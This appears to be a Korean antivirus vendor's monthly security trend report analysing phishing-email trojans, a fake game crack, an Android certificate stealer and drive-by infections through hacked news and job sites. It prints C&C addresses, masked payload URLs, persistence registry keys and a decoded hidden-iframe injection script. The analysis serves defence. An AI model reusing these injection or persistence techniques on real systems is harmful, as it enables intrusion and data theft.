17 17 로그램을검사하고사용자가선택적으로삭제또는허용할수있도록하고있다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-PUP/Downloader.UtilTop Trojan/Win32.OnlineGameHack Trojan/Win32.Scar Spyware/Win32.Agent 그림 1-56 C&C 서버에연결된시스템 인기게임에숨어든 좀비 PC 만드는악성코드 인기게임 심시티 를불법으로즐길수있는크랙 (crack) 파일로위장한악성코드가발견됐다. 해당악성코드는 토렌트 를통해국내외의불법파일공유사이트를통해유포중이며, 인기게임을공짜로즐기기위해불법다운로드하는유저를대상으로하여빠르게확산하고있다. 그림 1-57 일본에위치한 C&C 서버 그림 1-58 C&C 서버와통신중인다른좀비 PC V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Ircbot ( ) 그림 1-54 한창인기몰이중인 심시티 신작게임악성코드는 SimCityCrake.exe 와 mscsvc.dll 2개의파일로구성되어있다. Simcitycrake.exe를실행하면 mscsvc.dll 파일을 windows 폴더에 mssyssrv.exe로복사한뒤, [ 그림 1-55] 와같이 Microsoft Windows System Service 란이름으로서비스에등록해좀비PC로만든다. 구인정보메일에숨어유포된악성코드최근국내 OO신문사인사관리부장이헤드헌팅을통해연락을한다는내용의 IT직구인메일에악성코드가첨부돼유포된사례가보고됐다. 메일본문에는더좋은작업환경과대우를해준다면서구체적인대우및관련사항은첨부파일을열람하도록유도했다. 호기심을유발하는사회공학적기법을이용한전형적인사례다. 메일수신인또한국내신문사메일주소였다. 해당악성코드는APT 공격을위한것으로, 메일의본문내용은 [ 그림 1-59] 와같다. 그림 1-55 서비스에등록된악성코드 서비스에등록된프로세스는일본에위치한 IRC로구성된 C&C서버에접속후, 지속적으로명령을전달받는다. [ 그림 1-56] 과같이다수의좀비PC들이이미서버에연결중인것으로확인된다. 그림 1-59 수신된메일의내용
18 18 아래 [ 그림 1-60] 과같이메일원본의헤더정보를보면발신지 IP(KR) 를확인할수있다. 해당 IP는 TCP 25번포트가오픈돼있었고, 릴레이가허용되어있지않아외부에서메일을발송할수없었다. 대신해당 IP로웹브라우징하면 [ 그림 1-61] 과같이국내학회사이트로접속이되는것을확인할수있는데, 악성코드유포메일이발송된것을보면해당서버가해킹돼 APT 공격에악용된것으로판단된다. - %Temp%\ope1.tmp.bat - %Systemroot%\system32\Microsoft\WindowsUpdate.dll - %Systemroot%\system32\Microsoft\WindowsUpdate.reg - %ALLUSERPROFILE%\DebugLog.log - %ALLUSERPROFILE%\789a2558.dat [ 레지스트리등록 ] - HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run\WindowsUpdate "%Systemroot%\system32\Microsoft\WindowsUpdate.dll" 그림 1-60 메일원본헤더 그림 1-63 파일구성도 ope1.tmp.bat 파일은 **** 모집내용및상관대우.hwp[ 생략 ].exe 파일을삭제하는배치파일이고, WindowsUpdate.reg 파일은 WindowsUpdate.dll 파일을레지스트리에등록하기위한파일이다. 그림 1-61 메일발송 IP 로웹브라우징 메일에첨부된파일을압축해제하면아래와같이 HWP 문서를가장한실행파일을확인할수있다. DebugLog.log 파일은확인되지않는 MD5값과 C&C 서버로보이는호스트이름, 포트정보등이담겨있고 789a2558.dat 파일은 0바이트파일로 DebugLog.log 파일에포함돼있는 MD5값의앞여덟자리로파일이름이구성돼있다. 그림 1-64 DebugLog.log 파일내용 그림 1-62 압축해제된첨부파일 해당파일을실행하면아래와같은파일이생성되고시스템시작시자동으로실행되도록레지스트리에등록된다. 악성코드감염시실행되는 **** 모집내용및상관대우.hwp 파일은정상파일이며, [ 그림 1-65] 와같이신문광고공개입찰내용과광고금액이들어있다. [ 파일생성 ] - %Temp%\WINWORD.exe - %Temp%\**** 모집내용및상관대우.hwp
19 19 첨부된파일은아래그림과같이 PDF 아이콘의모습을하고있지만, exe 확장자를가진실행파일이며등록정보에서보면알수없는문자열로이루어져있는항목들로정상파일이아님을짐작할수있다. 그림 1-65 **** 모집내용및상관대우.hwp 파일내용 그림 1-67 첨부된악성파일 WindowsUpdate.dll 파일은 rundll32.exe 프로세스에로드되어동작하며, 아래 C&C 서버로접속한다. - by13.****news.com:443 C&C 서버로부터명령하달시시스템정보및키로깅정보를유출할것으로추정되며, C&C 서버에해당되는도메인은홍콩에서등록된도메인이지만, 해당도메인의 IP는국내 IP로확인된다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Win-Trojan/Dropper ( ) Trojan/Win32.Agent ( ) Win-Trojan/Agent ( ) 세계적인물류업체 DHL로위장한스팸메일대중에게잘알려진기업 ( 은행, 택배회사, 통신사및카드사등 ) 으로위장해안내메일인양악성코드를첨부한스팸메일을유포하는사례는하루이틀된이야기가아니다. 최근에도세계적인물류센터인 DHL로위장한악성코드첨부스팸메일이유포된바있어사용자의주의가요구된다. 해당메일은 DHL DELIVERY REPORT 라는제목으로쓰여있으며, 가까운우체국에서소포를찾아가라는내용과함께첨부된파일을실행하도록유도하고있다. 그림 1-68 첨부된악성파일등록정보해당메일에첨부된악성파일을실행하면생성되는파일은아래와같다. DHL-LABEL-ID-24 CREATE C:\Documents and Settings\All 생성된 svchost.exe 파일은윈도우기본방화벽을우회하기위해 svchost.exe 파일을예외처리하며이로인해방화벽이설정된시스템이라면아래와같이보안경고안내창을확인할수있다. 그림 1-66 DHL 위장스팸메일전문 그림 1-69 방화벽경고알림창
20 20 네트워크연결정보를보면예외처리된 svchost.exe 파일은백도어로서특정포트 (8000) 를 LISTENING 상태로열어둔것을확인할수있다. 그림 1-72 메일에첨부된악성파일 사용자의폴더옵션이알려진확장자에대한숨김설정이돼있는경우라면위와같이확장자가보이지않아사용자는 PDF 문서로판단하고파일을실행, 악성코드에감염될수있다. 파일을열어보면, 아래와같이윈도우실행파일 (PE) 형태인것을확인할수있다. 그림 1-70 악성 svchost.exe 네트워크정보국제운송업체, 은행등으로위장해악성코드를유포하는스팸메일은예전부터지속적으로발생하고있고, 현재에도주요보안위협으로악용돼피해사례역시꾸준히발생하고있다. 이에발신인이명확하지않거나, 첨부파일이포함된메일에대해서는확인시각별한주의가필요하다. V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Agent ( ) HSBC 은행위장스팸메일 HSBC은행으로위장, 메일에악성파일을첨부해유포한사례가발견됐다. 기존스팸메일과유포형태는크게다르지않지만, 해당 HSBC 은행은국내에도다수의지점이운영되고있다는점에서감염피해가발생될수있어해당내용을전하고자한다. 메일제목은 Payment Advice - Advice Ref: [B ] 이다. 수신된메일의본문은 [ 그림 1-71] 과같이첨부된 e-advice 내용을참고하라고쓰여있다. 그림 1-73 파일내부확인파일이실행되어악성코드에감염되면추가로아래의파일이다운로드돼생성된다. [ 파일생성 ] - %TEMP%\ exe - %AppData%\Ciria\izdoes.exe - %TEMP%\ exe - %TEMP%\ exe - %TEMP%\ exe 또한, 시스템재시작시에도동작할수있도록아래의값을레지스트리에등록한다. [ 레지스트리등록 ] - HKCU\Software\Microsoft\Windows\CurrentVersion\ Run\{ F-6E50-AD40-5B B9F7020} "C:\Documents and Settings\Administrator\Application Data\Ciria\izdoes.exe" 감염시아래의경로로접속을시도한다 ***.***:8080/pon***/gate.php ***.***/pon***/gate.php ***.***:8080/pon***/gate.php - hepcsupport.net/pon***/gate.php 그리고아래의경로를통해추가적인악성파일을다운로드하고, 실행한다. 그림 1-71 수신된메일의내용 첨부된파일은아래와같으며, PDF 문서의아이콘을가지고있다 ****.sites.****registeredsite.com/***AeL.exe - heermeyer-i*********.de/**u4.exe - 15******.webhosting*****.de/**2LLnfS.exe
21 21 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > Trojan/Win32.Tepfer ( ) 출장보고서문서파일로위장한악성코드문서파일로위장해사용자PC를교묘히감염시키는수법이최근부쩍늘고있다. 이번에발견된악성코드는아래와같이워싱톤출장결과보고서.exe 라는파일명으로 MS워드문서파일형식의아이콘을그대로사용하고있어사용자가문서파일로혼동하고실행하도록유도하고있다. 그림 1-77 중국서버에주기적으로접속시도 V3 제품에서는아래와같이진단이가능하다. 그림 1-74 문서파일로위장한악성코드 악성코드는 RAR 실행압축파일로제작돼있으며, 해당파일을실행하면 1.doc 문서파일과 g1.exe,mspool.dll 실행파일을드롭한다. 이후 1.doc 문서를열고 g1.exe 파일을실행시키는데, 이때문서파일은손상돼있어 MS워드에서제대로열리지않는다. 그림 1-78 네트워크연결정보 그림 1-75 doc 문서열기실패메시지이후악성코드는 mspool.dll 파일을 Windows mspool service. 라는이름의윈도우서비스로등록하고주기적으로동작시킨다. <V3 제품군의진단명 > Win-Trojan/Agent ( ) Win-Trojan/Agent ( ) Backdoor/Win32.Etso ( ) 메일에첨부된악성 HWP 국내특정기관및산업체에서악성 HWP 파일이첨부된메일이수신됐다. 관련파일들은수집됐으나, 메일의원문은확인되지않았다. 그림 1-76 등록된악성서비스 등록된악성서비스는아래의중국에위치한서버에주기적으로접속을시도하나분석당시해당서버는접근이불가능했다. 첨부파일은 ' 협력확대방안.hwp', ' 제안서.hwp', ' 대응방안.hwp' 파일명으로확인되며, 관련정보를다루는기관및업체를통해 APT를목적으로유포한것으로보인다. 취약점이존재하는관련문서편집프로그램버전에서해당파일을열면, [ 그림 1-79] 와같이정상적인문서파일실행으로위장하기위해관련문서가실행된다.
22 22 또한아래의특정서버로수집된시스템정보를전송하는것으로추정된다. 그림 1-82 특정서버로의접속정보 V3 제품에서는아래와같이진단이가능하다. <V3 제품군의진단명 > HWP/Exploit ( ) Trojan/Win32.Agent ( ) 그림 1-79 실행되는정상 HWP 문서 다만, 해당문서가실행됨과동시에사용자모르게악성파일이생성및실행되어, 악성코드에감염된다. 감염시생성되는파일은아래와같으며, 정상문서출력을위한한글문서파일 (tmp.hwp) 과악성파일 (msupdate.exe) 이생성된다. [ 파일생성 ] %TEMP%\tmp.hwp ( 정상파일 ) %TEMP%\msupdate.exe ( 악성 ) 그리고아래와같이서비스에등록되어시스템재시작이후부터악의적인행위를수행하며, 서비스명은윈도우정상서비스인것처럼위장해등록된다. 03 악성코드동향 모바일악성코드이슈 스마트폰사용자의공인인증서를탈취하는악성앱발견 그림 1-80 레지스트리에등록된서비스정보생성된악성파일 (msupdate.exe) 이실행되면 net.exe, net1.exe, ipconfig.exe, tasklist.exe, systeminfo.exe 등의프로세스를통해 OS, 계정, 네트워크, 프로세스, 설치된프로그램등의시스템에대한각종정보를수집한다. 최근금전적이득을목적으로안드로이드기반의스마트폰사용자에게문자메시지를발송해수신된메시지에첨부된링크를접속하도록하는형태의악성앱이끊임없이유포되고있다. 기존에발견된악성앱은소액결제인증번호를가로채는악성코드였지만, 이번에발견된악성앱 (SmsProtect) 은스마트폰에설치된공인인증서와문자메시지를탈취한다. 스미싱문자는할인쿠폰, 공짜쿠폰, 영화할인권, 소액결제문자등으로위장해유포되고있다. 그림 1-81 악성코드에의해수집된시스템정보 그림 1-83 다양한형태로유포되고있는스미싱문자
23 23 [ 그림 1-84] 는스미싱문자를통해유포된악성앱 (SmsProtect) 의설치화면이다. 해당앱은 SMS 읽기, 네트워크통신, 내장메모리를접근하는권한을사용한다. 해당정보가전송되는서버의 IP 주소와계정정보는디컴파일된코드에서확인할수있다. 그림 1-84 공인인증서를탈취하는안드로이드악성앱설치화면 악성앱을실행하면정상적으로실행되지않고종료되지만, 스마트폰번호와감염시간정보를특정서버 (110.**.***.91) 에전송한다. 그림 1-88 SSH 연결정보악성코드제작자는스마트폰에서탈취한공인인증서와보안카드를이용해사용자에게금전적피해를일으킬수있다. 스마트폰사용자들은피해가발생하지않도록각별히주의해야한다. V3 Mobile 제품에서는아래와같이진단이가능하다. 그림 1-85 네트워크연결정보연결을시도하는서버주소는악성앱 (APK) 내부 assets 폴더의 url.txt 파일에설정되어있으며, 해당폴더에는 mobile.txt, path.txt, prefix.txt 파일도함께존재한다. <V3 제품군의진단명 > Android-Trojan/SMSstealer 그림 1-86 assets 폴더에존재하는 txt 파일악성앱은스마트폰와이파이를활성화하고시큐어셸 (SSH) 을이용해서특정서버 (174.***.**.50) 에연결한다. 이후스마트폰에서수집한공인인증서와메모파일을사진파일과함께서버로전송한다. 그림 1-87 공인인증서, 메모, 사진탈취기능
24 SECURITY TREND 보안동향 보안통계 4 월마이크로소프트보안업데이트현황 년 4 월마이크로소프트사에서발표한보안업데이트는총 9 건 으로긴급 2 건, 중요 7 건이다. Windows 시스템의취약점과관련된업 데이트가가장높은비중을차지했으며, 비공개취약점두건에대한 Internet Explorer 누적보안업데이트도발표됐다. 현재까지해당취약 점을악용한공격사례는발견되지않았으나, 추후악용될가능성이존 재하므로최신보안업데이트의적용이필요하다. 긴급 MS Internet Explorer 누적보안업데이트 MS RDP 클라이언트의취약점으로인한원격코드실행취약점 중요 MS SharePoint 서버의취약점으로인한정보노출취약점 MS Windows 커널취약점으로인한권한상승취약점 MS Active Directory 취약점으로인한서비스거부취약점 MS Windows CSRSS 취약점으로인한권한상승취약점 MS Windows Defender 취약점으로인한권한상승취약점 MS HTML 구성요소의취약점으로인한권한상승취약점 MS 커널모드드라이버취약점으로인한권한상승취약점 표 년 04 월주요 MS 보안업데이트 그림 2-1 공격대상기준별 MS 보안업데이트
25 SECURITY TREND 보안동향 보안이슈 Internet Explorer 제로데이취약점 (CVE ) 마이크로소프트에서는 Internet Explorer8(IE8) 에서 CVE 취약점을악용하는제로데이취약점이발견됐다고발표했다. 영향을받는운영체제는 IE8이설치될수있는모든운영체제로 Windows XP( 서비스팩 3), Windows Vista, Windows Server 2003, Windows 7, Windows Server 2008 등널리사용되는운영체제버전들이모두영향을받을수있기때문에 IE8을사용하는사용자들은각별한주의가필요하다. 본취약점은공격자가악의적으로특수하게조작한웹페이지에 IE8을통해접속할경우, 메모리처리오류가발생하면서원격코드수행이가능하다. 메모리처리 IE에서사용하는모듈인 mshtml.dll 내부에서발생하며, 이미삭제되었거나올바르게할당되지않은객체에대한접근을시도하면서발생한다. 이로인해현재사용자의권한으로공격자가원하는코드를실행할수있게된다. 이미해외에서해당취약점을악용한실제공격사례도발견됐으며, 취약점테스트도구인 Metasploit을통해서도본취약점과관련해테스트를수행할수있는스크립트가공개되어있다. 그림 2-3 Metasploit에서공개한 IE8 제로데이공격스크립트일부본취약점은 TrusGuard 제품군에서다음과같이탐지및차단하고있다. - ms_ie_cgeneric_object_exploit-1(cve ) - ms_ie_cgeneric_object_exploit-2(cve ) - javascript_malicious_drive-1(http) 사용자 PC 를제어하는악성원격관리프로그램주의 그림 2-2 Metasploit을통한 IE8 제로데이공격테스트화면현재마이크로소프트에서본취약점을대상으로하는 Fix It 패치를제공하고있으며, Fix It 패치는다음위치에서확인할수있다 ( support.microsoft.com/kb/ ). 추후 Fix It 패치외에도정식보안패치가제공될것으로보이며, 정식보안패치가제공되기전까지는 IE에서스크립트실행기능을제한하고, 구글크롬 (Google Chrome) 이나모질라 (Mozilla), 파이어폭스 (Firefox) 등다른웹브라우저를사용하거나 (Windows XP의경우 ) IE9 또는 10 버전으로업그레이드 (Windows Vista 또는 Windows 7의경우 ) 해여해당취약점으로부터시스템을보호할수있다. 원격관리프로그램 (Remote Administration Tool, 이하 RAT 프로그램 ) 이란본래소수의관리자가원격에서다수의컴퓨터를손쉽게제어하기위해사용되는도구로, 원격컴퓨터의화면을감시또는제어하거나, 파일을관리하고, 관리용셸명령을입력하는등의편리한기능을제공하는도구다. 이처럼원격컴퓨터에대한정보를모두획득하고제어할수있는 RAT 프로그램의강력한장점을악용해원격컴퓨터에악성코드를주입하거나, 사용자가입력하는정보를감시해가로채거나, 사용자의컴퓨터를공격자가제어해공격자대신특정대상에게공격을수행하도록명령하는악성 RAT 프로그램들이등장했다.
26 SECURITY TREND 26 악성 RAT 프로그램은그기능도강력하고종류도다양해매우위협적인프로그램이지만, 대다수의악성 RAT 프로그램은안티바이러스소프트웨어를통해탐지및대응이가능하다. 그림 2-4 악성 RAT 프로그램제어화면의예 악성 RAT 프로그램중널리알려진것으로는 Gh0st, Dark Comet, Poison Ivy 등이있으며이중 Gh0st의경우수많은변종이존재하는것으로유명하다. 이외에도다양한종류의악성 RAT 프로그램이존재하며그중에는원격컴퓨터에서 DDoS 공격을수행하도록하는기능이포함된것도존재한다. 악성 RAT 프로그램은최근위협이되고있는 APT 공격에도자주활용되고있다. 그림 2-5 DDoS 기능을포함하는악성 RAT 프로그램화면 악성 RAT 프로그램이사용자의컴퓨터에서실행되면공격자가미리설정해둔서버로접속해공격자가해당컴퓨터를제어할수있는명령을수신하도록한다. 접속과정이나명령전달과정에서발생하는네트워크트래픽은평문으로전송되는경우도있으나, 자신만의방식으로암호화해서전송하는경우도존재한다. 대부분의악성 RAT 프로그램은시스템의레지스트리나서비스에자기자신을등록해컴퓨터가다시시작하더라도해당프로그램역시실행될수있도록하며, 다른시스템프로세스에인젝션하는등의방법으로존재를은폐하는경우가대부분이다. 공격자는배포하고자하는악성 RAT 프로그램이접속할주소, 은폐여부, 서비스등록여부등을원하는대로설정해제작할수있다. 그림 2-6 배포용악성 RAT 프로그램설정예시
27 WEB SECURITY TREND 웹보안동향 웹보안통계 웹사이트악성코드동향안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하면, 2013년 4월악성코드를배포하는웹사이트를차단한건수는모두 1만1821건이었다. 악성코드유형은총 301종, 악성코드가발견된도메인은 191개, 악성코드가발견된 URL은 654개로각각집계됐다. 전월과비교해서악성코드유형, 악성코드발견된 URL은다소감소했으나, 악성코드발견건수, 악성코드가발견된도메인은증가했다. 악성코드배포 URL 차단건수 7,861 11, % 악성코드유형악성코드가발견된도메인악성코드가발견된 URL Graph 표 년 4 월웹사이트보안현황 월별악성코드배포 URL 차단건수 2013년 4월악성코드발견건수는전월 7861건과비교해 50% 수준증가한 1만1821건이다. 15,000 10,000 5,000 8, % , % +3,960 11, % 그림 3-1 월별악성코드배포 URL 차단건수변화추이
28 WEB SECURITY TREND 28 월별악성코드유형 2013년 4월의악성코드유형은전월의 328건에비해 8% 감소한 301건이다 % % 8.2% 그림 3-2 월별악성코드유형수변화추이 월별악성코드가발견된도메인 2013년 4월악성코드가발견된도메인은 191건으로 2013년 3 월의 181건에비해 6% 증가했 % % 5.2% +10 다 그림 3-3 월별악성코드가발견된도메인수변화추이 월별악성코드가발견된 URL 2013년 4월악성코드가발견된 1, % % % URL은전월의 783건과비교해 84% 수준인 654건이었다 그림 3-4 월별악성코드가발견된 URL 수변화추이
29 WEB SECURITY TREND 29 악성코드유형별배포수악성코드유형별배포수를보면트로이목마가 5627건 (47.6%) 으로가장많았고, 애드웨어가 1508건 (12.8%) 인것으로조사됐다. 유형 건수 비율 TROJAN 5, % ADWARE 1, % DROPPER % DOWNLOADER % Win32/VIRUT % SPYWARE % JOKE % APPCARE % ETC 3, % TOTAL 11, % 표 3-2 악성코드유형별배포수 TROJAN 5,627 ETC 3,795 5,000 ADWARE 1,508 DROPPER 330 2,500 DOWNLOADER 264 Win32/VIRUT 148 SPYWARE 71 JOKE 62 APPCARE 15 0 그림 3-5 악성코드유형별배포수 악성코드최다배포수악성코드배포최다 10건중에서 Trojan/Win32.KorAd이 842 건으로 1위를차지하였으며, TextImage/Viking 등 4건이새로등장하였다. 순위 등락 악성코드명 건수 비율 1 Trojan/Win32.KorAd % 2 NEW TextImage/Viking % 3 NEW Win-Trojan/Morix B % 4 1 ALS/Qfas % 5 1 ALS/Bursted % 6 4 Adware/Win32.Clicker % 7 3 Packed/Win32.Vmpbad % 8 NEW Win-Trojan/Agent % 9 Trojan/Win32.HDC % 10 NEW Adware/Win32.StartPage % TOTAL 5, % 표 3-3 악성코드배포최다 10 건
30 WEB SECURITY TREND 웹보안동향 웹보안이슈 4월 1개월간악성코드유포목적으로해킹된사이트의특징을요약해보면아래와같다. 1 언론사사이트를통한악성코드유포 2 취업포털사이트를통한악성코드유포 그림 3-6 난독화된악성스크립트가삽입된배너페이지 언론사사이트를통한악성코드유포여기에언급된언론사사이트는한동안악성코드유포를하다가잠잠했으나 4월중순부터다시악성코드를유포한것이확인됐다. 그당시패킷로그를분석해보면, 최종적으로악성실행파일을다운로드하기위해우선 1차로해당언론사사이트의특정페이지에난독화된악성스크립트가삽입돼있었다. GET /********/****all.html HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: menu=******* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: news.*********.com Connection: Keep-Alive ****all.html은 상단배너 라는문구를통해서난독화된악성스크립트가삽입된페이지가배너기능을담당하는페이지임을유출해볼수있으며, 해당배너페이지에는아래그림처럼정상스크립트링크뿐만아니라 Function형태로난독화된악성스크립트코드가존재함을알수있다. 그림 3-6] 을보면 Function형태로난독화된악성스크립트코드중간에빈공간이존재하는것처럼인식될수있으나이는사실눈속임을위한것으로스페이스키와탭키가조합되어암호화된코드영역이다 ( 참고로 16진수로스페이스키는 0x20, 탭키는 0x09를의미한다 ). 해당언론사사이트는예전에도위 [ 그림 3-6] 처럼특정배너페이지에유사한형식을통해서난독화된악성스크립트가삽입됐고, 그를통해최종적으로악성코드가다운로드된바있다. document.write(unescape("%3ciframe%20src%3dhttp%3a%2f% 2Fwww%2E******%2Ecom%2Fkcp%2Fbin%2FTop%2Ehtml%20 width%3d100%20height%3d0%3e%3c%2fiframe%3e")); <iframe src= width=100 height=0></iframe> [ 그림 3-6] 에삽입된난독화된악성스크립트를분석해보면위코드처럼 Top.html을다운로드하는 iframe 태그였음을알수있다. 그림 3-7 공다익스플로이트킷으로된 Top.html
31 WEB SECURITY TREND 31 위 [ 그림 3-8] 은 Top.html의내부코드중일부이며, 국내해킹된웹사이트들에서흔히볼수있는공사익스플로이트킷 (Gongda Exploit Kit) 으로제작및난독화된악성스크립트다. Top.html 역시분석해보면다중취약점 (Java, Internet Explorer, Flash Player 등에존재 ) 을사용해최종실행가능한형태의악성코드인 60.exe를다운로드하도록돼있다. 위패킷로그를기반으로악성코드유포경로를추적해보면다음과같다. 취업포털사이트 ) 그림 3-8 Top.html에서사용하는자바취약점 (CVE ) 60.exe는아래와같은기능을가지고있다. 특정사이트접속 (qkrxotjr6060.*****.net:6060) 키로깅기능을통해서감염된 PC의키보드입력내용을기록함파일다운로드프로세스강제종료 rasphone.pbk(device, PhoneNumber, DialParamsUID 정보탈취 ) 실제악성스크립트가삽입된페이지는 ****_proc.js인데, 해당페이지는아래처럼난독화된악성스크립트코드를가지고있으며분석해보면최종적으로 그림 3-9 ****_proc.js 에저장된난독화악성스크립트 취업포털사이트를통한악성코드유포악성코드를유포했던사이트들중상당수는해당사이트가취약해서악성코드를유포하는것이아니라, 외부에서불러와사용하는콘텐츠 ( 예를들면, 배너광고등 ) 가해킹돼악성코드를유포하는사례다. 4월에발견된취업포털사이트를통한악성코드유포도해당사이트가취약해해킹된것이아니라외부에서불러와링크했던페이지가해킹돼악성코드를유포한것이다. 이는마치취업포털사이트가해킹되어악성코드를유포한것으로인식될수있다. 그당시패킷로그를보면취업포털사이트는아래처럼외부사이트에서특정 php파일을불러옴을알수있다. GET /pages/etc/**********_etc.php HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Accept-Encoding: gzip, deflate Host: www. **********bridge.co.kr Connection: Keep-Alive index.html 역시공다익스플로이트킷으로제작및난독화된악성스크립트로, 그형태는 (1) 언론사사이트를통한악성코드유포 에서살펴봤던 Top.html과동일하다. 그림 3-10 index.html에서사용하는자바취약점 (CVE ) 해당취업포털사이트에접속했던 PC에자바가설치되어있고, [ 그림 3-10] 의취약점 (CVE ) 이존재한다면 img.jpg파일을다운로드한후실행된다. 다운로드된 img.jpg는확장자만보면그림파일이므로단독으로실행했을경우그림판을통해서또는이미지를볼수있는프로그램을통해서 img.jpg파일의내용을보여주지만다운로드된해당파일은확장자만 jpg일뿐실제로는실행가능한 exe파일이다. img.jpg파일은아래와같은기능을가지고있다. 윈도우시스템파일교체백신기능무력화및프로세스강제종료특정온라인게임사용자의계정정보탈취
32 ASEC REPORT CONTRIBUTORS 집필진 선임연구원 안창용 선임연구원 이도현 주임연구원 문영조 주임연구원 김재홍 연구원 강민철 연구원 김혜선 대리 황선욱 참여연구원 ASEC 연구원 SiteGuard 연구원 편집 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T F Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited AhnLab, Inc. All rights reserved.
< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationSecurity Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationASEC REPORT VOL
ASEC REPORT VOL.46 2013.10 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More informationAhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 A
ASEC REPORT VOL.27 212.4 안랩월간보안보고서 212 년 3 월의보안동향 212 년 1 분기보안동향 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc.
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationCONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안
ASEC REPORT VOL.44 2013.08 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
